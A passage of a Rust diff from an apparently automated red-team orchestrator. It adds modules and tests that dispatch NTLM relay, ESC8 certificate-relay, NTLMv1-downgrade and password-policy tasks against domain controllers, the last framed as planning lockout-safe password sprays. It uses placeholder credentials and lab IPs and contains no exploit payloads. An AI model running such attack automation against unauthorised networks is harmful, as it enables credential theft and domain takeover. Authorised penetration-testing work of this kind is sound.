+ #[test] + fn smb_to_ldap_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlm_relay_ldap", + "relay_target": "192.168.58.22", + "listener_ip": "192.168.58.100", + "coercion_source": "192.168.58.10", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_ldap"); + assert_eq!(payload["relay_target"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn esc8_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let relay_type = RelayType::Esc8 { + ca_name: "contoso-CA".into(), + domain: "contoso.local".into(), + }; + let payload = json!({ + "technique": "ntlm_relay_adcs", + "relay_target": "192.168.58.10", + "listener_ip": "192.168.58.100", + "ca_name": "contoso-CA", + "domain": "contoso.local", + "coercion_source": "192.168.58.20", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_adcs"); + assert_eq!(payload["ca_name"], "contoso-CA"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(relay_type.to_string(), "esc8_adcs"); + } + + #[test] + fn target_ip_extraction_from_vuln_details() { + let details = serde_json::json!({"target_ip": "192.168.58.22", "ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_ip_field() { + let details = serde_json::json!({"ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.23"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.99"); + } + + #[test] + fn ca_host_extraction_fallback() { + let details = serde_json::json!({"ca_host": "192.168.58.10"}); + let fallback = "192.168.58.99"; + let ca_host = details + .get("ca_host") + .or_else(|| details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host, "192.168.58.10"); + + let details2 = serde_json::json!({"target_ip": "192.168.58.20"}); + let ca_host2 = details2 + .get("ca_host") + .or_else(|| details2.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host2, "192.168.58.20"); + } + + #[test] + fn ca_name_extraction() { + let details = serde_json::json!({"ca_name": "contoso-CA"}); + let ca_name = details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name, "contoso-CA"); + + let details2 = serde_json::json!({}); + let ca_name2 = details2 + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name2, ""); + } + + #[test] + fn find_coercion_source_all_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_some()); + } + + #[test] + fn relay_type_display_exhaustive() { + let smb = RelayType::SmbToLdap; + assert_eq!(format!("{smb}"), "smb_to_ldap"); + + let esc8 = RelayType::Esc8 { + ca_name: String::new(), + domain: String::new(), + }; + assert_eq!(format!("{esc8}"), "esc8_adcs"); + } + + // --- collect_relay_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred() -> ares_core::models::Credential { + ares_core::models::Credential { + id: "c1".into(), + username: "svcadmin".into(), + password: "S3cure!Pass".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "kerberoast".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_smb_vuln(id: &str, target_ip: &str) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + serde_json::Value::String(target_ip.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "smb_signing_disabled".to_string(), + target: target_ip.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn make_esc8_vuln( + id: &str, + ca_host: &str, + ca_name: &str, + domain: &str, + ) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "ca_host".to_string(), + serde_json::Value::String(ca_host.to_string()), + ); + details.insert( + "ca_name".to_string(), + serde_json::Value::String(ca_name.to_string()), + ); + details.insert( + "domain".to_string(), + serde_json::Value::String(domain.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "esc8".to_string(), + target: ca_host.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 8, + } + } + + #[tokio::test] + async fn collect_relay_work_empty_state() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "empty state should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_no_credentials() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_smb_signing_disabled() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "smb_relay:192.168.58.22"); + assert_eq!(work[0].relay_target, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert!(matches!(work[0].relay_type, RelayType::SmbToLdap)); + assert_eq!(work[0].coercion_source, Some("192.168.58.10".into())); + assert_eq!(work[0].credential.username, "svcadmin"); + } + + #[tokio::test] + async fn collect_relay_work_esc8_vuln() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "esc8_relay:192.168.58.30"); + assert_eq!(work[0].relay_target, "192.168.58.30"); + match &work[0].relay_type { + RelayType::Esc8 { ca_name, domain } => { + assert_eq!(ca_name, "contoso-CA"); + assert_eq!(domain, "contoso.local"); + } + _ => panic!("expected Esc8 relay type"), + } + // No DCs configured → coercion_source is None + assert!(work[0].coercion_source.is_none()); + } + + #[tokio::test] + async fn collect_relay_work_skips_already_processed_dedup() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + // Mark the relay key as already processed + s.mark_processed(DEDUP_SET, "smb_relay:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_relay_work_skips_exploited_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "exploited vulns should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_multiple_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + s.discovered_vulnerabilities.insert( + "v3".into(), + make_esc8_vuln("v3", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 3, "should produce work for all 3 vulns"); + + let smb_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::SmbToLdap)) + .count(); + let esc8_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::Esc8 { .. })) + .count(); + assert_eq!(smb_count, 2); + assert_eq!(esc8_count, 1); + } + + #[tokio::test] + async fn collect_relay_work_ignores_unrelated_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + // Add an unrelated vuln type + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + serde_json::Value::String("192.168.58.40".to_string()), + ); + s.discovered_vulnerabilities.insert( + "v_unrelated".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "v_unrelated".into(), + vuln_type: "mssql_impersonation".into(), + target: "192.168.58.40".into(), + discovered_by: "scanner".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 3, + }, + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "unrelated vuln types should not produce work" + ); + } + + #[tokio::test] + async fn collect_relay_work_esc8_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.mark_processed(DEDUP_SET, "esc8_relay:192.168.58.30".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "already-processed esc8 should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_mixed_exploited_and_fresh() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + // Only v1 is exploited + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].relay_target, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_relay_work_coercion_source_prefers_uncoerced_dc() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Mark first DC as already coerced + s.mark_processed(DEDUP_COERCED_DCS, "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].coercion_source, + Some("192.168.58.20".into()), + "should prefer the uncoerced DC" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs new file mode 100644 index 00000000..a89c9a77 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs @@ -0,0 +1,382 @@ +//! auto_ntlmv1_downgrade -- detect DCs allowing NTLMv1 authentication. +//! +//! When a DC accepts NTLMv1 (LmCompatibilityLevel < 3), attackers can +//! downgrade auth to capture NTLMv1 hashes via Responder/MITM, which are +//! trivially crackable. This module dispatches a check per DC. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect NTLMv1 downgrade work items from state (pure logic, no async). +fn collect_ntlmv1_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("ntlmv1:{}", dc_ip); + if state.is_processed(DEDUP_NTLMV1_DOWNGRADE, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(NtlmV1Work { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks each DC for NTLMv1 downgrade vulnerability. +/// Interval: 45s. +pub async fn auto_ntlmv1_downgrade( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("ntlmv1_downgrade") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_ntlmv1_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("ntlmv1_downgrade"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_NTLMV1_DOWNGRADE, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_NTLMV1_DOWNGRADE, &item.dedup_key) + .await; + + // Register ntlmv1_downgrade vulnerability proactively so it + // appears in reports without waiting for the agent's + // report_finding callback (which only logs). + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("ntlmv1_{}", item.dc_ip.replace('.', "_")), + vuln_type: "ntlmv1_downgrade".to_string(), + target: item.dc_ip.clone(), + discovered_by: "auto_ntlmv1_downgrade".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.dc_ip)); + d.insert("domain".to_string(), json!(item.domain)); + d.insert( + "description".to_string(), + json!("DC allows NTLMv1 authentication (LmCompatibilityLevel < 3). NTLMv1 hashes are trivially crackable."), + ); + d + }, + recommended_agent: "credential_access".to_string(), + priority: dispatcher.effective_priority("ntlmv1_downgrade"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + domain = %item.domain, + dc = %item.dc_ip, + "NTLMv1 downgrade — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to publish NTLMv1 downgrade vulnerability"); + } + } + } + Ok(None) => { + debug!(domain = %item.domain, "NTLMv1 downgrade check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch NTLMv1 downgrade check"); + } + } + } + } +} + +struct NtlmV1Work { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert_eq!(key, "ntlmv1:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1_downgrade"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlmv1_downgrade_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlmv1_downgrade_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = NtlmV1Work { + dedup_key: "ntlmv1:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_uses_dc_ip() { + // NTLMv1 dedup is by DC IP, not domain + let key = format!("ntlmv1:{}", "192.168.58.10"); + assert!(key.starts_with("ntlmv1:")); + assert!(key.contains("192.168.58.10")); + } + + // --- collect_ntlmv1_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "ntlmv1:192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1:192.168.58.10".into()); + let work = collect_ntlmv1_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_dcs_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_uses_ip_not_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.starts_with("ntlmv1:")); + assert!(work[0].dedup_key.contains("192.168.58.10")); + assert!(!work[0].dedup_key.contains("contoso")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_ntlmv1_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("ntlmv1:{}", "192.168.58.10"); + let key2 = format!("ntlmv1:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/password_policy.rs b/ares-cli/src/orchestrator/automation/password_policy.rs new file mode 100644 index 00000000..9ae27ca8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/password_policy.rs @@ -0,0 +1,380 @@ +//! auto_password_policy -- enumerate password policy per domain. +//! +//! Password policies reveal lockout thresholds, complexity requirements, and +//! minimum lengths. This information is critical for planning password spray +//! attacks without triggering lockouts. +//! +//! Dispatches `password_policy` recon tasks per discovered domain+DC pair. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_password_policy_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("policy:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_PASSWORD_POLICY, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(PasswordPolicyWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Enumerates password policy on each domain controller. +/// Interval: 30s. +pub async fn auto_password_policy( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("password_policy") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_password_policy_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "password_policy", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("password_policy"); + match dispatcher + .throttled_submit("recon", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Password policy enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_POLICY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_POLICY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Password policy task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch password policy enum"); + } + } + } + } +} + +struct PasswordPolicyWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("policy:{}", "contoso.local"); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PASSWORD_POLICY, "password_policy"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "password_policy", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "password_policy"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = PasswordPolicyWork { + dedup_key: "policy:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "policy:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("policy:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "policy:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("policy:{}", "contoso.local"); + let key2 = format!("policy:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into()); + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut 